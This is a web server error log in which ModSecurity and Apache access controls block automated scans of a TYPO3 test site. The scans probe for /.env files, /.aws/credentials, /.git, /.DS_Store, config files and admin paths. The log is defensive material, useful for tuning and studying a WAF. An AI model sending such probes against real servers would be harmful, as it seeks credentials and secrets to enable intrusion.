[Mon May 27 08:38:33.199746 2024] [:error] [pid 3503319] [client 109.202.99.41:4801] [client 109.202.99.41] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZlQqaVCy82iAIbN4OsijmAAAAAQ"]
[Mon May 27 08:38:33.199978 2024] [:error] [pid 3503319] [client 109.202.99.41:4801] [client 109.202.99.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZlQqaVCy82iAIbN4OsijmAAAAAQ"]
[Mon May 27 08:38:33.200182 2024] [:error] [pid 3503319] [client 109.202.99.41:4801] [client 109.202.99.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ZlQqaVCy82iAIbN4OsijmAAAAAQ"]
[Mon May 27 08:38:33.254879 2024] [authz_core:error] [pid 3503317] [client 109.202.99.41:28717] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Mon May 27 08:38:33.255086 2024] [authz_core:error] [pid 3503576] [client 109.202.99.41:37833] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon May 27 08:38:33.258747 2024] [authz_core:error] [pid 3503584] [client 109.202.99.41:22485] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Mon May 27 08:38:33.266281 2024] [authz_core:error] [pid 3503316] [client 109.202.99.41:49631] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Tue May 28 11:25:10.392141 2024] [:error] [pid 3530739] [client 44.203.225.75:46684] [client 44.203.225.75] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZlWi9ut_hOVsP2t9KKVzmwAAAAg"]
[Tue May 28 11:25:10.392799 2024] [:error] [pid 3530739] [client 44.203.225.75:46684] [client 44.203.225.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZlWi9ut_hOVsP2t9KKVzmwAAAAg"]
[Tue May 28 11:25:10.393279 2024] [:error] [pid 3530739] [client 44.203.225.75:46684] [client 44.203.225.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZlWi9ut_hOVsP2t9KKVzmwAAAAg"]
[Tue May 28 11:25:15.807280 2024] [:error] [pid 3525682] [client 44.203.225.75:46688] [client 44.203.225.75] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ZlWi-9YbBsMOXz68PrO8qQAAAAI"]
[Tue May 28 11:25:15.807781 2024] [:error] [pid 3525682] [client 44.203.225.75:46688] [client 44.203.225.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ZlWi-9YbBsMOXz68PrO8qQAAAAI"]
[Tue May 28 11:25:15.808230 2024] [:error] [pid 3525682] [client 44.203.225.75:46688] [client 44.203.225.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "ZlWi-9YbBsMOXz68PrO8qQAAAAI"]
[Tue May 28 11:25:26.124577 2024] [:error] [pid 3530738] [client 44.203.225.75:53520] [client 44.203.225.75] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_example"] [unique_id "ZlWjBg4X-ZsZ2S9SX61tTwAAAAc"]
[Tue May 28 11:25:26.125079 2024] [:error] [pid 3530738] [client 44.203.225.75:53520] [client 44.203.225.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_example"] [unique_id "ZlWjBg4X-ZsZ2S9SX61tTwAAAAc"]
[Tue May 28 11:25:26.125524 2024] [:error] [pid 3530738] [client 44.203.225.75:53520] [client 44.203.225.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_example"] [unique_id "ZlWjBg4X-ZsZ2S9SX61tTwAAAAc"]
[Tue May 28 11:25:31.446072 2024] [:error] [pid 3527901] [client 44.203.225.75:49618] [client 44.203.225.75] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "ZlWjC5MV6Eeopv6xI-bC9wAAAAY"]
[Tue May 28 11:25:31.446571 2024] [:error] [pid 3527901] [client 44.203.225.75:49618] [client 44.203.225.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "ZlWjC5MV6Eeopv6xI-bC9wAAAAY"]
[Tue May 28 11:25:31.447514 2024] [:error] [pid 3527901] [client 44.203.225.75:49618] [client 44.203.225.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "ZlWjC5MV6Eeopv6xI-bC9wAAAAY"]
[Wed May 29 12:31:31.470356 2024] [:error] [pid 3548013] [client 103.102.228.130:58168] [client 103.102.228.130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlcEA_y2I6587Lelj0kptgAAAAU"]
[Wed May 29 12:31:31.470987 2024] [:error] [pid 3548013] [client 103.102.228.130:58168] [client 103.102.228.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlcEA_y2I6587Lelj0kptgAAAAU"]
[Wed May 29 12:31:31.471452 2024] [:error] [pid 3548013] [client 103.102.228.130:58168] [client 103.102.228.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZlcEA_y2I6587Lelj0kptgAAAAU"]
[Thu May 30 13:22:07.325952 2024] [authz_core:error] [pid 3570579] [client 163.5.210.79:43156] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jun 05 10:18:05.745467 2024] [authz_core:error] [pid 3718943] [client 104.234.204.32:47062] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jun 05 22:17:46.313663 2024] [authz_core:error] [pid 3717563] [client 104.234.204.32:37066] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Thu Jun 06 13:58:30.381644 2024] [authz_core:error] [pid 3740052] [client 104.234.204.32:47602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Fri Jun 07 19:29:27.755882 2024] [:error] [pid 3762379] [client 45.14.195.141:44218] [client 45.14.195.141] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZmNDd3C6_RQDf_qxypk9EwAAAAE"]
[Fri Jun 07 19:29:27.756445 2024] [:error] [pid 3762379] [client 45.14.195.141:44218] [client 45.14.195.141] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZmNDd3C6_RQDf_qxypk9EwAAAAE"]
[Fri Jun 07 19:29:27.756907 2024] [:error] [pid 3762379] [client 45.14.195.141:44218] [client 45.14.195.141] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZmNDd3C6_RQDf_qxypk9EwAAAAE"]
[Sat Jun 08 16:53:16.884559 2024] [authz_core:error] [pid 3784620] [client 104.234.204.32:35512] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sun Jun 09 15:14:09.520613 2024] [authz_core:error] [pid 3814522] [client 104.234.204.32:55590] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/www
[Mon Jun 10 05:59:14.504847 2024] [authz_core:error] [pid 3829248] [client 45.135.57.32:7605] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git, referer: http://surf.test.indacotrentino.com/.git/HEAD
[Mon Jun 10 06:53:11.692266 2024] [authz_core:error] [pid 3831798] [client 104.234.204.32:55360] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/www
[Thu Jun 13 04:32:50.368611 2024] [authz_core:error] [pid 3896579] [client 104.234.204.32:46204] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Fri Jun 14 19:39:53.987725 2024] [authz_core:error] [pid 3931347] [client 83.147.52.49:44918] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jul 10 06:43:22.899166 2024] [authz_core:error] [pid 331905] [client 83.147.52.49:58326] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Wed Jul 10 06:43:22.904168 2024] [authz_core:error] [pid 331906] [client 83.147.52.49:58340] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Wed Jul 10 06:43:22.899693 2024] [authz_core:error] [pid 331902] [client 83.147.52.49:58244] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/s3
[Wed Jul 10 06:43:22.902379 2024] [authz_core:error] [pid 331903] [client 83.147.52.49:58338] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dev
[Wed Jul 10 06:43:22.907253 2024] [authz_core:error] [pid 332395] [client 83.147.52.49:58274] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/site
[Wed Jul 10 06:43:22.908238 2024] [authz_core:error] [pid 331904] [client 83.147.52.49:58336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/git
[Wed Jul 10 06:43:22.908960 2024] [authz_core:error] [pid 331901] [client 83.147.52.49:58372] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Wed Jul 10 06:43:23.004700 2024] [authz_core:error] [pid 331905] [client 83.147.52.49:58326] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Wed Jul 10 06:43:23.006533 2024] [authz_core:error] [pid 331903] [client 83.147.52.49:58338] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Wed Jul 10 06:43:23.006828 2024] [authz_core:error] [pid 332395] [client 83.147.52.49:58274] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/htdocs
[Wed Jul 10 06:43:23.008754 2024] [authz_core:error] [pid 331906] [client 83.147.52.49:58340] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/http
[Wed Jul 10 06:43:23.009033 2024] [authz_core:error] [pid 331902] [client 83.147.52.49:58244] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/www
[Wed Jul 10 06:43:23.011108 2024] [authz_core:error] [pid 331904] [client 83.147.52.49:58336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/home
[Wed Jul 10 06:43:23.011377 2024] [authz_core:error] [pid 331901] [client 83.147.52.49:58372] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
[Wed Jul 10 06:43:23.108487 2024] [authz_core:error] [pid 332395] [client 83.147.52.49:58274] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Wed Jul 10 06:43:23.109549 2024] [authz_core:error] [pid 331902] [client 83.147.52.49:58244] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Wed Jul 10 06:43:23.113585 2024] [authz_core:error] [pid 331904] [client 83.147.52.49:58336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/css
[Wed Jul 10 06:43:23.115303 2024] [authz_core:error] [pid 331903] [client 83.147.52.49:58338] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wiki
[Wed Jul 10 06:43:23.127754 2024] [authz_core:error] [pid 331901] [client 83.147.52.49:58372] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/web
[Wed Jul 10 06:43:23.306328 2024] [authz_core:error] [pid 331902] [client 83.147.52.49:58244] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vendor
[Wed Jul 10 06:43:23.312826 2024] [authz_core:error] [pid 331905] [client 83.147.52.49:58326] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/back
[Wed Jul 10 06:43:23.319440 2024] [authz_core:error] [pid 331901] [client 83.147.52.49:58372] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/login
[Wed Jul 10 06:43:23.322202 2024] [authz_core:error] [pid 332395] [client 83.147.52.49:58274] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Wed Jul 10 06:43:23.322385 2024] [authz_core:error] [pid 331904] [client 83.147.52.49:58336] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/index
[Sun Jul 21 21:57:49.402194 2024] [authz_core:error] [pid 609701] [client 83.147.52.49:57876] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jul 25 21:52:55.788183 2024] [authz_core:error] [pid 714374] [client 146.190.103.103:59838] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Thu Jul 25 21:52:57.465822 2024] [:error] [pid 714378] [client 146.190.103.103:59872] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZqKtGWfPnx_aQQLCYKJntAAAAAk"]
[Thu Jul 25 21:52:57.466330 2024] [:error] [pid 714378] [client 146.190.103.103:59872] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZqKtGWfPnx_aQQLCYKJntAAAAAk"]
[Thu Jul 25 21:52:57.466662 2024] [:error] [pid 714378] [client 146.190.103.103:59872] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZqKtGWfPnx_aQQLCYKJntAAAAAk"]
[Thu Jul 25 21:52:58.026199 2024] [:error] [pid 714333] [client 146.190.103.103:59880] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqKtGqiabRTPksDDjebZVwAAABQ"]
[Thu Jul 25 21:52:58.026670 2024] [:error] [pid 714333] [client 146.190.103.103:59880] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqKtGqiabRTPksDDjebZVwAAABQ"]
[Thu Jul 25 21:52:58.027092 2024] [:error] [pid 714333] [client 146.190.103.103:59880] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqKtGqiabRTPksDDjebZVwAAABQ"]
[Thu Jul 25 21:52:58.520882 2024] [authz_core:error] [pid 714334] [client 146.190.103.103:59894] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jul 27 02:29:19.087617 2024] [:error] [pid 738446] [client 45.148.10.230:35172] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqQ_X8QAcooafEMjreR6EwAAAAU"]
[Sat Jul 27 02:29:19.088351 2024] [:error] [pid 738446] [client 45.148.10.230:35172] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqQ_X8QAcooafEMjreR6EwAAAAU"]
[Sat Jul 27 02:29:19.088864 2024] [:error] [pid 738446] [client 45.148.10.230:35172] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqQ_X8QAcooafEMjreR6EwAAAAU"]
[Sat Jul 27 11:19:43.805669 2024] [:error] [pid 741686] [client 45.148.10.230:52424] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqS7r5w4nfG8X_SXoz170AAAAAY"]
